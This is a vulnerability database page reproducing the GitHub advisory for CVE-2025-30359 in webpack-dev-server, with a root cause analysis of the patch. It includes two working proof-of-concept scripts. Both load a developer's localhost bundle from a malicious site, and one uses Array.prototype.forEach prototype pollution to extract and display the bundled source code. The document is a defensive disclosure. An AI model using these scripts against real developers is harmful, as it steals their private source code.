5.3

CVSS Score

Basic Information

CVE ID

CVE-2025-30359

GHSA ID

GHSA-4v9v-hfq4-rm2v

EPSS Score

CWE

CWE-749

Published

6/4/2025

Updated

6/4/2025

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-30359

CVE-2025-30359:
webpack-dev-server users' source code may be stolen when they access a malicious web site

Summary

Source code may be stolen when you access a malicious web site.

Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables. By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

PoC

Download reproduction.zip and extract it
Run npm i
Run npx webpack-dev-server
Open https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/
You can see the source code output in the document and the devtools console.

The script in the POC site is:

let moduleList
const onHandlerSet = (handler) => {
  console.log('h', handler)
  moduleList = handler.require.m
}

const originalArrayForEach = Array.prototype.forEach
Array.prototype.forEach = function forEach(callback, thisArg) {
  callback((handler) => {
    onHandlerSet(handler)
  })
  originalArrayForEach.call(this, callback, thisArg)
  Array.prototype.forEach = originalArrayForEach
}

const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
  console.log(moduleList)
  for (const key in moduleList) {
    const p = document.createElement('p')
    const title = document.createElement('strong')
    title.textContent = key
    const code = document.createElement('code')
    code.textContent = moduleList[key].toString()
    p.append(title, ':', document.createElement('br'), code)
    document.body.appendChild(p)
  }
})
document.head.appendChild(script)

This script uses the function generated by renderRequire.

    // The require function
    function __webpack_require__(moduleId) {
        // Check if module is in cache
        var cachedModule = __webpack_module_cache__[moduleId];
        if (cachedModule !== undefined) {
            return cachedModule.exports;
        }
        // Create a new module (and put it into the cache)
        var module = __webpack_module_cache__[moduleId] = {
            // no module.id needed
            // no module.loaded needed
            exports: {}
        };
        // Execute the module function
        var execOptions = {
            id: moduleId,
            module: module,
            factory: __webpack_modules__[moduleId],
            require: __webpack_require__
        };
        __webpack_require__.i.forEach(function(handler) {
            handler(execOptions);
        });
        module = execOptions.module;
        execOptions.factory.call(module.exports, module, module.exports, execOptions.require);
        // Return the exports of the module
        return module.exports;
    }

Especially, it uses the fact that Array::forEach is called for __webpack_require__.i and execOptions contains __webpack_require__. It uses prototype pollution against Array::forEach to extract __webpack_require__ reference.

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.

<details> <summary>Old content</summary>

Summary

Source code may be stolen when you use output.iife: false and access a malicious web site.

Details

When output.iife: false is set, some global variables for the webpack runtime are declared on the window object (e.g. __webpack_modules__). Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on the window object. By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

I pointed out output.iife: false, but if there are other options that makes the webpack runtime variables to be declared on the window object, the same will apply for those cases.

PoC

Download reproduction.zip and extract it
Run npm i
Run npx webpack-dev-server
Open https://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/
Open the devtools console.
You can see the content of src/index.js and other scripts loaded.

The script in the POC site is:

const script = document.createElement('script')
script.src = 'http://localhost:8080/main.js'
script.addEventListener('load', () => {
    for (const module in window.__webpack_modules__) {
        console.log(`${module}:`, window.__webpack_modules__[module].toString())
    }
})
document.head.appendChild(script)

Impact

This vulnerability can result in the source code to be stolen for users that has output.iife: false option set and uses a predictable port and output path for the entrypoint script.

</details>

(GitHub Advisory)

5.3

CVSS Score

Basic Information

CVE ID

CVE-2025-30359

GHSA ID

GHSA-4v9v-hfq4-rm2v

EPSS Score

CWE

CWE-749

Published

6/4/2025

Updated

6/4/2025

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
webpack-dev-server	npm	<= 5.2.0	5.2.1

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability (CVE-2025-30359/GHSA-4v9v-hfq4-rm2v) in webpack-dev-server allows for source code theft. It occurs because the server does not properly validate cross-origin requests for JavaScript assets. Specifically, it fails to check the Sec-Fetch-Mode and Sec-Fetch-Site headers. An attacker can host a malicious webpage that includes a <script> tag sourcing a JavaScript bundle from a victim's webpack-dev-server instance (if the port and bundle path are known or guessable). Because 'no-cors' requests for classic scripts are not subject to the Same-Origin Policy for execution, the browser fetches and executes the script.

The exploit then relies on prototype pollution. The attacker's script on the malicious page modifies a built-in JavaScript object prototype (like Array.prototype.forEach). When the webpack bundle (served by webpack-dev-server) executes, its internal __webpack_require__ function might use the polluted method (e.g., iterating over __webpack_require__.i using the compromised forEach). This allows the attacker's code to gain a reference to webpack's internal structures, specifically __webpack_modules__ (often aliased as __webpack_require__.m). This object contains the functions for each module in the bundle. The attacker can then iterate through these modules and use Function.prototype.toString() on each module function to retrieve its source code, effectively stealing the application's frontend code.

The provided patch (commit 5c9378bb01276357d7af208a0856ca2163db188e) addresses this by introducing a new middleware in lib/Server.js. This middleware explicitly checks if an incoming request has headers[\"sec-fetch-mode\"] === \"no-cors\" and headers[\"sec-fetch-site\"] === \"cross-site\". If both conditions are true, the server responds with a 403 Forbidden status, blocking the request and preventing the exploit. The vulnerability, therefore, was the absence of this check in the Server class's request handling logic.

Vulnerable functions

Server (request handling logic)

lib/Server.js

The `Server` class's request handling mechanism in `webpack-dev-server` was vulnerable because it did not check for `Sec-Fetch-Mode: 'no-cors'` and `Sec-Fetch-Site: 'cross-site'` HTTP headers when serving JavaScript files. This omission allowed malicious cross-origin websites to embed a `<script>` tag pointing to the victim's webpack-dev-server instance (e.g., `http://localhost:8080/main.js`). When the browser requested this script, `webpack-dev-server` would serve it. The malicious page's script could then perform prototype pollution (e.g., on `Array.prototype.forEach`) to hook into the webpack runtime's `__webpack_require__` function. This allowed access to `__webpack_require__.m` (an alias for `__webpack_modules__`), which contains all the bundled modules. By iterating over these modules and using `Function.prototype.toString()` on them, the attacker could exfiltrate the application's source code. The vulnerability was the lack of this specific cross-origin check in the server's request processing pipeline.

WAF Protection Rules

WAF Rule

### Summ*ry Sour** *o** m*y ** stol*n w**n you ****ss * m*li*ious w** sit*. ### **t*ils ****us* t** r*qu*st *or *l*ssi* s*ript *y * s*ript t** is not su*j**t to s*m* ori*in poli*y, *n *tt**k*r **n inj**t `<s*ript sr*="*ttp://lo**l*ost:****/m*in.js">

Reasoning

T** vuln*r**ility (*V*-****-*****/**S*-*v*v-**q*-rm*v) in `w**p**k-**v-s*rv*r` *llows *or sour** *o** t***t. It o**urs ****us* t** s*rv*r *o*s not prop*rly v*li**t* *ross-ori*in r*qu*sts *or J*v*S*ript *ss*ts. Sp**i*i**lly, it **ils to ****k t** `S**

5.3

Basic Information

Concerned about an active attack path?

CVE-2025-30359: webpack-dev-server users' source code may be stolen when they access a malicious web site

Summary

Details

PoC

Impact

Summary

Details

PoC

Impact

5.3

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

CVE-2025-30359:
webpack-dev-server users' source code may be stolen when they access a malicious web site

Vulnerability Intelligence
Miggo AI